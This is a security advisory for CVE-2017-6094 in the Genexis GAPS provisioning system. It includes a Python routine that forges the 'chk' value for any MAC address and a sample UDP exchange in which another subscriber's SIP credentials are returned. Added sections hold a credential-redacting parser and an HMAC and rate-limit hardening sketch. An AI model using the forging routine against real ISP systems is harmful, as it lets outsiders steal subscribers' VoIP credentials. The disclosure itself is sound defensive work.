Genexis GAPS 7.2 Access Control

Posted Dec 20, 2017
Authored by Antoine Neuenschwander

Genexis GAPS versions up to 7.2 suffer from an access control vulnerability that discloses sensitive data.

tags | exploit, info disclosure
advisories | CVE-2017-6094
SHA-256 | 655a32ed49ee22745ac8ca02bd5c3c53a21a5bfbaacf074229b041503865e94a

################################################################################
#                                                                              #
# CVE-2017-6094 - Genexis GAPS Access Control Vulnerability                    #
#                                                                              #
################################################################################
#                                                                              #
# Product: Genexis Automatic Provisioning System (GAPS)                        #
# Vendor: Genexis B.V.                                                         #
# CVE ID: CVE-2017-6094                                                        #
# Subject: Access control vulnerability                                        #
# Effect: Leaked configuration settings, including user credentials            #
# Author: Antoine Neuenschwander <antoine@schoggi.org>                         #
# Date: 2017-12-18                                                             #
#                                                                              #
################################################################################


Vendor/product description:
-----------------------------
Genexis develops FTTH equipment for the optical distribution networks of ISPs
including customer premises equipment (CPE) as well as infrastructure
components, supporting triple-play services (broadband internet, IPTV and VoIP).
The Genexis Automatic Provisioning System (GAPS) is the service used to monitor,
configure and update the CPEs.
URL: https://genexis.eu/product/gaps/

Introduction:
-------------
Management of Genexis CPEs can be done using TR-069 or DHCP/TFTP in combination
with UDP-based CPE commands. The CPE checks for the most recent settings at
startup and performs periodic update checks. GAPS provides the configuration
settings for individual CPEs based on the device's MAC address. A configuration
record includes the following settings (among others):
- tftp server address, used to retrieve firmware images
- ingress and egress bitrates, according to the user's subscription
- sip server address, used to register to a VoIP service
- sip client credentials, used to authenticate the VoIP client
- ...
Given the MAC address, it was found possible to retrieve the configuration
settings of other subscribers' CPEs by sending forged UDP packets to GAPS. As a
result, sensitive data such as the sip credentials are exposed.

Affected:
---------
This issue affects all versions up to 7.2. First mitigations are available
after version 6.1.

Technical Description:
----------------------
A CPE identifies itself by the MAC address of its WAN interface and a certain
"chk" value (48-bit) derived from the MAC. The algorithm used to compute the
"chk" was recovered by reverse engineering the CPE's firmware (retrieved from
the tftp server). Because the derivation uses no secret, it is possible to
forge valid "chk" values for any given MAC address using the following Python
routine:

    def chk(mac):
        # Accept both "00:0f:94:61:ca:fe" and the bare "000f9461cafe" form
        # used in the UDP messages below.
        a = list(bytes.fromhex(mac.replace(':', '')))
        chk = [0] * 6

        # Each output byte is a fixed linear combination of three MAC bytes
        # plus a constant, truncated to 8 bits. The parentheses only make the
        # precedence explicit: in Python '&' already binds weaker than '+'.
        chk[5] = (1*a[0] + 3*a[1] + 7*a[2] + 115) & 0xff
        chk[3] = (7*a[1] + 1*a[2] + 3*a[3] + 101) & 0xff
        chk[0] = (3*a[2] + 7*a[3] + 1*a[4] + 99) & 0xff
        chk[4] = (1*a[3] + 3*a[4] + 7*a[5] + 114) & 0xff
        chk[1] = (3*a[0] + 7*a[4] + 1*a[5] + 101) & 0xff
        chk[2] = (7*a[0] + 1*a[1] + 3*a[5] + 116) & 0xff

        return ':'.join('{:02x}'.format(x) for x in chk)

Example UDP message exchange (CPE <-> GAPS):
--------------------------------------------

> mac=000f9461cafe
> chk=90e97d8523ac
> type=OCG1018MX
> hw=0
> fw=OCG1018MX.v1.10.0.10c.bin
> stage=0

< vlan_mmt=62241
< vlan_voice=58146
< vlan_p1=33572
< defpri=0000000000000000
< vlansp1=8324
< prip1=00
< userid0=<phonenr>
< authid0=<userid>
< passwd0=<password>
< clip0=1
< clir0=0
< callwait0=0
< conference0=0
< clip1=0
< clir1=0
< callwait1=0
< conference1=0
< tftp_server=10.21.0.7
< tftp_server_port=69
< storecfg=0
< sip_server=<sip provider ip>
< sip_server_port=5060
< ratecount=3
< reg_exp=4
< country=ch
< send_dtmf=1
< sendflash=0
< dialplan=4|0[2-7]1[^]8|0[89]1[^]8|18[0-9]2|16[0-9]1|[^]+
< cliptype=1
< erate_p1=300
< versionOCG1018MX=OCG1018MX.v1.10.0.10c.bin
< erate_wan=300
< irate=012c0000000000000000000000000000
< erate=012c0000000000000000000000000000
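The exchange above is a plain key=value protocol, and the response carries the
VoIP account identifiers and password in cleartext. The following parser is an
added example (not part of the advisory or of Genexis' software) for anyone who
has to analyse or log such captures: it splits a transcript into the CPE request
and the GAPS response, lists the fields that carry credentials, and produces a
redacted copy safe to write to a log. The transcript embedded in it is a
constructed excerpt of the exchange above with the same placeholder values; the
`SENSITIVE_PREFIXES` list is an assumption based on the field names shown, not a
vendor-documented classification.

```python
import re

# Constructed excerpt of the exchange above, in the same key=value format
# ('>' lines are sent by the CPE, '<' lines by GAPS). Credential values are
# placeholders, exactly as in the advisory.
EXCHANGE = """\
> mac=000f9461cafe
> chk=90e97d8523ac
> type=OCG1018MX
> hw=0
> fw=OCG1018MX.v1.10.0.10c.bin
> stage=0

< userid0=<phonenr>
< authid0=<userid>
< passwd0=<password>
< tftp_server=10.21.0.7
< sip_server=<sip provider ip>
< sip_server_port=5060
< dialplan=4|0[2-7]1[^]8|0[89]1[^]8|18[0-9]2|16[0-9]1|[^]+
"""

# Key prefixes whose values are secrets or account identifiers (assumption
# based on the field names in the response). The numeric suffix (userid0,
# passwd1, ...) selects the VoIP line, so we match on the prefix only.
SENSITIVE_PREFIXES = ("passwd", "authid", "userid")

_LINE = re.compile(r"^([<>])\s*([^=\s]+)=(.*)$")


def parse_exchange(text):
    """Split a transcript into (request, response) dicts.

    Only the first '=' separates key from value, so values containing
    '=' or '|' (e.g. dialplan) survive verbatim.
    """
    request, response = {}, {}
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue  # blank line or a line that is not key=value
        direction, key, value = m.groups()
        (request if direction == ">" else response)[key] = value
    return request, response


def sensitive_fields(record):
    """Keys of a record that carry credentials, in transcript order."""
    return [k for k in record if k.startswith(SENSITIVE_PREFIXES)]


def redact(record, mask="<redacted>"):
    """Copy of a record with credential values masked, for safe logging."""
    return {k: (mask if k.startswith(SENSITIVE_PREFIXES) else v)
            for k, v in record.items()}


if __name__ == "__main__":
    req, resp = parse_exchange(EXCHANGE)
    print("request from MAC", req["mac"], "with chk", req["chk"])
    print("credential fields in response:", sensitive_fields(resp))
    for k, v in redact(resp).items():
        print(f"  {k}={v}")
```

The same parser can be pointed at a full capture; anything that is not a
`>`/`<` key=value line is skipped rather than treated as an error.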

Workaround / Fix:
-----------------
As of GAPS 6.2, GAPS provides a workaround to limit CPE requests. To further
improve security, it is advised to use MACless provisioning with a random
postfix to harden the workaround.
Starting with GAPS 7.3, the GAPS protocol will support a mechanism to prevent
calculated checksums from being valid.
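The two measures named above rest on a general principle: a value that any
party can compute from the (public) MAC address cannot authenticate the CPE,
whereas a keyed authenticator can, and bounding how many distinct MACs one
source may query limits enumeration while the protocol is being changed. The
code below is an added illustration of that principle and is not Genexis'
GAPS 6.2 workaround or 7.3 mechanism: it assumes a server-side secret
(`PROVISIONING_KEY`, a constructed sample value) that is shared with each CPE
out of band, replaces the derivable "chk" with a 48-bit truncation of
HMAC-SHA256 over the MAC so the wire size stays the same, and adds a per-source
sliding-window limiter on distinct MACs. All names are hypothetical.

```python
import hashlib
import hmac
import secrets
from collections import defaultdict, deque

# Hypothetical server-side secret, assumed to be provisioned into each CPE out
# of band and never derivable from the MAC (constructed sample, not a real key).
PROVISIONING_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")


def normalise_mac(mac):
    """'00:0f:94:61:ca:fe' or '000f9461cafe' -> 6 raw bytes."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError("MAC must be 6 bytes")
    return raw


def keyed_chk(mac, key):
    """48-bit authenticator: HMAC-SHA256 over the MAC, truncated to 6 bytes.

    Same size as the original 'chk' field, but without the key it cannot be
    computed from the MAC alone, so knowing the algorithm does not help.
    """
    return hmac.new(key, normalise_mac(mac), hashlib.sha256).digest()[:6].hex()


def verify_chk(mac, chk, key):
    """Constant-time comparison so timing does not leak the expected value."""
    try:
        expected = keyed_chk(mac, key)
        return hmac.compare_digest(expected, chk.replace(":", "").lower())
    except ValueError:
        return False  # malformed MAC: refuse rather than raise


class RequestLimiter:
    """Bound how many distinct MACs one source address may query per window.

    A genuine CPE only asks about its own MAC; a source cycling through many
    MACs looks like enumeration and is refused once it exceeds the limit.
    """

    def __init__(self, max_distinct_macs, window_seconds):
        self.limit = max_distinct_macs
        self.window = window_seconds
        self.seen = defaultdict(deque)  # source -> deque of (timestamp, mac)

    def allow(self, source, mac, now):
        q = self.seen[source]
        while q and now - q[0][0] > self.window:
            q.popleft()  # expire entries that fell outside the window
        distinct = {m for _, m in q}
        if mac not in distinct and len(distinct) >= self.limit:
            return False
        q.append((now, mac))
        return True


if __name__ == "__main__":
    mac = "00:0f:94:61:ca:fe"
    tag = keyed_chk(mac, PROVISIONING_KEY)
    print("keyed chk:", tag, "verifies:", verify_chk(mac, tag, PROVISIONING_KEY))
    # A party that knows only the MAC and the algorithm has no key to use.
    print("random key accepted?", verify_chk(mac, tag, secrets.token_bytes(16)))

    limiter = RequestLimiter(max_distinct_macs=2, window_seconds=60)
    for i, m in enumerate(["000f9461cafe", "000f9461cafe",
                           "000f9461caff", "000f9461cb00"]):
        verdict = limiter.allow("198.51.100.7", m, now=100 + i)
        print(m, "allowed" if verdict else "refused")
```

The limiter keys on the source address only; a deployment that can also see
the DHCP lease or the access port would key on that instead, since a source
address alone is weaker evidence of which subscriber is asking.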

Timeline:
---------
2017-01-13: Found vulnerability
2017-01-16: Contacted ISP
2017-01-17: ISP confirms vulnerability and contacts vendor
2017-01-18: Vendor confirms vulnerability
2017-02-13: CVE-ID requested
2017-02-19: CVE-ID assigned
2017-05-19: Vendor agrees on disclosure date: 2017-07-03
2017-06-23: Vendor postpones disclosure date: 2017-09-01
2017-07-31: Vendor postpones disclosure date: 2017-12-18
2017-12-18: Coordinated disclosure
